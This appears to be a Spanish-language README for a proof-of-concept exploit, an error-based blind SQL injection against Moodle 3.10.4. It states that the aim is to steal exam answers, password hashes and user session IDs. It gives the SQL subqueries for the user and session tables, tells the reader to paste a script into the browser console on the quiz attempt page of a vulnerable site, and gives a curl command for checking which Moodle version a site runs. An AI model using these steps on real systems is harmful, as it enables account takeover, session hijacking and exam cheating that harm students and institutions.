
Inyección SQL ciega basada en errores con enfoque de desplazamiento de bits para Moodle 3.10.4
Inyección SQL ciega basada en errores con enfoque de desplazamiento de bits para Moodle 3.10.4.
Permite a un atacante realizar consultas arbitrarias a la base de datos. Por ejemplo, se puede robar:
las respuestas de los exámenes de la base de datos
Modifica el archivo script.js y ejecútalo en la ruta /mod/quiz/attempt.php?attempt=...&cmid=...
los hashes de las contraseñas de los usuarios:
(SELECT password FROM mdl_user WHERE id = 2 LIMIT 1)
las sesiones de los usuarios:
(SELECT sid FROM mdl_sessions ORDER BY id DESC LIMIT 1)
Debes estar autenticado e inscrito en al menos un curso. Luego solo copia el código de script.js en la consola de tu navegador y ejecútalo en un sitio web que tenga la versión vulnerable de Moodle instalada.
DOMAIN="example.com"
curl -s https://$DOMAIN/lib/upgrade.txt | head